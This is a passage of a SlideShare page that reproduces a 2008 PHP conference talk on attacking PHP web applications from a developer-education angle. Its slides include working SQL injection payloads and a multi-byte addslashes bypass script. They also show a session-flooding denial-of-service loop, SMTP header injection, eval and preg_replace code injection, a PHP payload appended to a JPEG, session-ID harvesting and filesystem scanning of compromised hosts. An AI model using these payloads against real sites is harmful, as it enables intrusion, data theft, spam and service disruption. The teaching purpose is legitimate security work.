Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Exploiting Php With Php

39,915 views

Published on

Arpad Ray's PHPNW08 slides:

Looking at websites from the perspective of potential attackers is a useful technique not only for security professionals.
This talk demonstrates how to use simple PHP scripts to exploit many common security holes in PHP applications, hopefully giving developers a deeper understanding of what it is they are protecting against.

* Getting around common precautions against SQL injection
* Free spam with SMTP injection
* Making a malicious website to exploit PHP sessions
* The holes every attacker hopes for
* Making use of a newly exploited website

Published in: Technology
  • Be the first to comment

Exploiting Php With Php

  1. 1. Exploiting PHP with PHP Arpad Ray @ PHPNW08
  2. 2. Why use PHP for this? <ul><li>We already know how to write PHP </li></ul>
  3. 3. Why use PHP for this? <ul><li>We already know how to write PHP </li></ul><ul><li>Can use directly in test scripts </li></ul>
  4. 4. Why use PHP for this? <ul><li>We already know how to write PHP </li></ul><ul><li>Can use directly in test scripts </li></ul><ul><li>PHP provides everything we need </li></ul>
  5. 5. Why use PHP for this? <ul><li>We already know how to write PHP </li></ul><ul><li>Can use directly in test scripts </li></ul><ul><li>PHP provides everything we need </li></ul><ul><li>Writing PHP can be very quick </li></ul>
  6. 6. Why use PHP for this? <ul><li>We already know how to write PHP </li></ul><ul><li>Can use directly in test scripts </li></ul><ul><li>PHP provides everything we need </li></ul><ul><li>Writing PHP can be very quick </li></ul><ul><li>Can efficiently re-use and combine attacks </li></ul>
  7. 7. SQL injection <ul><li>Probably the first attack most PHP developers hear of </li></ul>
  8. 8. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = $_GET[id]&quot;; </li></ul>
  9. 9. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = $_GET[id]&quot;; </li></ul><ul><li>index.php?id=1 OR 1=1 $_GET['id'] = '1 OR 1=1'; </li></ul>
  10. 10. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = $_GET[id]&quot;; </li></ul><ul><li>index.php?id=1 OR 1=1 $_GET['id'] = '1 OR 1=1'; </li></ul><ul><li>$q = &quot;SELECT * FROM foobar WHERE id = 1 OR 1=1 &quot;; </li></ul>
  11. 11. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' $_GET[id] ' &quot;; </li></ul>
  12. 12. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' $_GET[id] ' &quot;; </li></ul><ul><li>index.php?id=' OR ''=' $_GET['id'] = “' OR ''='”; </li></ul>
  13. 13. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' $_GET[id] ' &quot;; </li></ul><ul><li>index.php?id=' OR ''=' $_GET['id'] = “' OR ''='”; </li></ul><ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' ' OR ''=' ' &quot;; </li></ul>
  14. 14. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' $_POST[id] ' &quot;; </li></ul>
  15. 15. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = $_POST[id]&quot;; </li></ul><ul><li><form method=”post” action=” http://example.com/foo.php ”> </li></ul><ul><li><input type=”hidden” name=”id” value=”1 OR 1=1” /> <input type=”submit” /> </form> </li></ul>
  16. 16. SQL injection <ul><li>$q = &quot;SELECT * FROM foobar WHERE id = $_POST[id]&quot;; </li></ul><ul><li>$context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => 'id=1 OR 1=1' ))); file_get_contents(' http://example.com/foo.php ', false, $context); </li></ul>
  17. 17. SQL injection <ul><li>$q = 'SELECT * FROM foobar WHERE id = ' . addslashes($id); </li></ul>
  18. 18. addslashes()‏ <ul><li>$id = addslashes($_POST['id']); $q = &quot;SELECT * FROM foobar WHERE id = ' $id ' &quot;; </li></ul><ul><li>$_POST['id'] = “' OR ''='”; </li></ul><ul><li>$q = &quot;SELECT * FROM foobar WHERE id = '' OR ''='' &quot;; </li></ul>
  19. 19. addslashes()‏ <ul><li>Getting around that pesky backslash </li></ul>
  20. 20. addslashes()‏ <ul><li>Getting around that pesky backslash </li></ul><ul><li>Multi-byte character attacks </li></ul>
  21. 21. addslashes()‏ <ul><li>Getting around that pesky backslash </li></ul><ul><li>Multi-byte character attacks </li></ul><ul><li>Swallow the backslash with a multi-byte character ending with that byte </li></ul>
  22. 22. addslashes()‏ <ul><li>Getting around that pesky backslash </li></ul><ul><li>Multi-byte character attacks </li></ul><ul><li>Swallow the backslash with a multi-byte character ending with that byte </li></ul><ul><li><start of mb character><single quote> // apply addslashes() <mb character><single quote> </li></ul>
  23. 23. addslashes()‏ <ul><li>$mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . '''; </li></ul>
  24. 24. addslashes()‏ <ul><li>$mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . '''; $id = &quot; $quote OR $quote$quote = $quote &quot;; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)) ))); file_get_contents('http://example.com/foo.php', false, $context); </li></ul><ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' ?' OR '?'='? ' &quot;; </li></ul>
  25. 25. addslashes()‏ <ul><li>$mbCharacter = &quot;xBFx5C&quot;; $quote = substr($mbCharacter, 0, -1) . '''; $id = &quot; $quote OR 1=1 /* &quot;; $context = stream_context_create(array('http' => array( 'method' => 'post' 'content' => http_build_query(array('id' => $id)) ))); file_get_contents('http://example.com/foo.php', false, $context); </li></ul><ul><li>$q = &quot;SELECT * FROM foobar WHERE id = ' ?' OR 1=1 /* ' &quot;; </li></ul>
  26. 26. magic_quotes_gpc <ul><li>Uses addslashes() so escaping is not secure </li></ul>
  27. 27. magic_quotes_gpc <ul><li>Uses addslashes() so escaping is not secure </li></ul><ul><li>Fosters complacency </li></ul>
  28. 28. magic_quotes_gpc <ul><li>Uses addslashes() so escaping is not secure </li></ul><ul><li>Fosters complacency </li></ul><ul><li>Applications using magic quotes are much harder to make truly portable </li></ul>
  29. 29. magic_quotes_gpc <ul><li>Uses addslashes() so escaping is not secure </li></ul><ul><li>Fosters complacency </li></ul><ul><li>Applications using magic quotes are much harder to make truly portable </li></ul><ul><li>Inconsistencies between PHP versions </li></ul>
  30. 30. magic_quotes_gpc <ul><li>$context = stream_context_create(array('http' => array( 'user_agent' => $foo ))); </li></ul><ul><li>$context = stream_context_create(array('http' => array( 'method' => 'get' 'header' => 'X-Foo: ' . $foo ))); </li></ul>
  31. 31. magic_quotes_gpc <ul><li>? scalar'1=foo& array'1[scalar'2]=foo& array'1[array'2][scalar'3]=foo </li></ul>
  32. 32. magic_quotes_gpc <ul><li>Expected result: </li></ul><ul><li>Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏ </li></ul>
  33. 33. magic_quotes_gpc <ul><li>PHP 4.3.3 </li></ul><ul><li>Array ( [ scalar'1 ] => foo [ array'1 ] => Array ( [ scalar'2 ] => foo [array'2] => Array ( [ scalar'3 ] => foo ) ) )‏ </li></ul>
  34. 34. magic_quotes_gpc <ul><li>PHP 4.4.0 </li></ul><ul><li>Array ( [ scalar'1 ] => foo [ array'1 ] => Array ( [ scalar'2 ] => foo [array'2] => Array ( [ scalar'3 ] => foo ) ) )‏ </li></ul>
  35. 35. magic_quotes_gpc <ul><li>PHP 5.0.0 (OFF)‏ </li></ul><ul><li>Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏ </li></ul>
  36. 36. magic_quotes_gpc <ul><li>PHP 5.2.2 </li></ul><ul><li>Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )‏ </li></ul>
  37. 37. magic_quotes_gpc <ul><li>There are also problems disabling magic_quotes_gpc </li></ul>
  38. 38. magic_quotes_gpc <ul><li>There are also problems disabling magic_quotes_gpc </li></ul><ul><li>function stripslashes_deep($value) { $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); return $value; } </li></ul>
  39. 39. magic_quotes_gpc <ul><li>There are also problems disabling magic_quotes_gpc </li></ul><ul><li>Instead of passing id=1 we can pass: 'id' . str_repeat('[]', 1000) . '=1' </li></ul><ul><li>We can trivially force the web server to do a lot of unnecessary work </li></ul>
  40. 40. Denial of Service <ul><li>Failure to release resources </li></ul>
  41. 41. Denial of Service <ul><li>Failure to release resources </li></ul><ul><li>Writing user data to disk </li></ul>
  42. 42. Denial of Service <ul><li>function fill_sessions($url, $num = 1000) { $context = stream_context_create(array( 'http' => array( 'method' => 'HEAD' ) )); for ($i = $num; $i--;) { file_get_contents($url, false, $context); } } </li></ul>
  43. 43. Denial of Service <ul><li>Failure to release resources </li></ul><ul><li>Writing user data to disk </li></ul><ul><li>Locking customer accounts </li></ul>
  44. 44. SMTP injection
  45. 45. SMTP injection <ul><li>$to = 'foobar@example.com'; </li></ul><ul><li>$subject = $_POST['subject']; </li></ul><ul><li>$from = $_POST['from']; </li></ul><ul><li>mail($to, $subject, 'From: ' . $from); </li></ul>
  46. 46. SMTP injection <ul><li>$context = stream_context_create(array('http' => array( </li></ul><ul><li>'method' => 'post' </li></ul><ul><li>'content' => http_build_query(array( </li></ul><ul><li>'subject' => &quot;foo Cc: target@example.com&quot;, </li></ul><ul><li>'from' => &quot;from@example.com Cc: target@example.com&quot; </li></ul><ul><li>))‏ </li></ul><ul><li>))); </li></ul>
  47. 47. SMTP injection <ul><li>Variable mail address </li></ul>
  48. 48. SMTP injection <ul><li>Variable mail address </li></ul><ul><li>Sanitisation </li></ul>
  49. 49. SMTP injection <ul><li>Variable mail address </li></ul><ul><li>Sanitisation </li></ul><ul><li>Validation </li></ul>
  50. 50. SMTP injection <ul><li>Variable mail address </li></ul><ul><li>Sanitisation </li></ul><ul><li>Validation </li></ul><ul><li>/^[^@]+@(?:w+.)+w{2,6}$/ </li></ul>
  51. 51. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul>
  52. 52. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul><ul><li>class Foo { function Foo() { $a = func_get_args(); print_r($a); } } </li></ul><ul><li>eval('$foo = new Foo(' . implode(',', $args) . ');'); </li></ul>
  53. 53. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul><ul><li>$args[0] = 'readfile(“/etc/passed”)'; </li></ul>
  54. 54. Hot vulnerabilities <ul><li>preg_replace() using /e modifier </li></ul><ul><li>$s = '$-42 dollars'; </li></ul><ul><li>preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏ </li></ul><ul><li>$s = '42'; </li></ul>
  55. 55. Hot vulnerabilities <ul><li>preg_replace() using /e modifier </li></ul><ul><li>$s = '$1).foobar().abs(1 dollars'; </li></ul><ul><li>preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏ </li></ul><ul><li>$s = '4242'; </li></ul>
  56. 56. Hot vulnerabilities <ul><li>preg_replace() using /e modifier </li></ul><ul><li>$s = '$1).readfile(chr(47).chr(101)...abs(1 dollars'; </li></ul><ul><li>preg_replace('/$(.*?) dollars/e', 'abs($1)', $s)‏ </li></ul><ul><li>$s = '4242'; </li></ul>
  57. 57. Hot vulnerabilities <ul><li>Variable in include() call </li></ul><ul><li>$page = $_GET['page']; include $page; </li></ul>
  58. 58. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul><ul><li>preg_replace() using /e modifier </li></ul><ul><li>Variable in include() call </li></ul><ul><li>Uploading PHP files </li></ul>
  59. 59. Hot vulnerabilities <ul><li>Uploading PHP files </li></ul><ul><ul><li>Check file extension </li></ul></ul><ul><ul><li>Check uploaded MIME type </li></ul></ul><ul><ul><li>Check file MIME type </li></ul></ul><ul><ul><li>Move outside of web root </li></ul></ul>
  60. 60. Hot vulnerabilities <ul><li>$script = <<<EOT <?php var_dump('hello world!'); EOT; $jpeg = '/path/to/some_valid.jpg'; $fp = fopen($jpeg, 'ab'); fwrite($fp, $script); fclose($fp); </li></ul>
  61. 61. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul><ul><li>preg_replace() using /e modifier </li></ul><ul><li>Variable in include() call </li></ul><ul><li>Uploading PHP files </li></ul>
  62. 62. Hot vulnerabilities <ul><li>Direct eval() injection </li></ul><ul><li>preg_replace() using /e modifier </li></ul><ul><li>Variable in include() call </li></ul><ul><li>Uploading PHP files </li></ul><ul><li>Shell injection </li></ul>
  63. 63. Making an evil website <ul><li>HTTP requests can give us lots of interesting information </li></ul><ul><li>PHPSESSID = bingo </li></ul>
  64. 64. Making an evil website <ul><li>if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+) /xi', $_SESSION['HTTP_REFERER'])); } </li></ul>
  65. 65. Making an evil website <ul><li>if (isset($_SESSION['HTTP_REFERER'])) { if (preg_match(' / PHPSESSID=([^=&]+) | </li></ul><ul><li>(?<==)([a-fd]{32}|[a-fd]{40}) /xi', $_SESSION['HTTP_REFERER'])); } </li></ul>
  66. 66. Making use of victims <ul><li>File scan </li></ul>
  67. 67. Making use of victims <ul><li>File scan </li></ul><ul><li>$dir = new RecursiveIteratorIterator( </li></ul><ul><li>new RecursiveDirectoryIterator('/', true)‏ </li></ul><ul><li>); </li></ul><ul><li>foreach ($dir as $file) { </li></ul><ul><li>echo $file->getPathname(), &quot; &quot;; </li></ul><ul><li>} </li></ul>
  68. 68. Making use of victims <ul><li>File scan </li></ul><ul><li>Subverting existing files </li></ul>
  69. 69. Making use of victims <ul><li>File scan </li></ul><ul><li>Subverting existing files </li></ul><ul><li>Escalate privileges, take over machine </li></ul>
  70. 70. Making use of victims <ul><li>File scan </li></ul><ul><li>Subverting existing files </li></ul><ul><li>Escalate privileges, take over machine </li></ul><ul><li>botnet.php </li></ul>
  71. 71. Questions?

×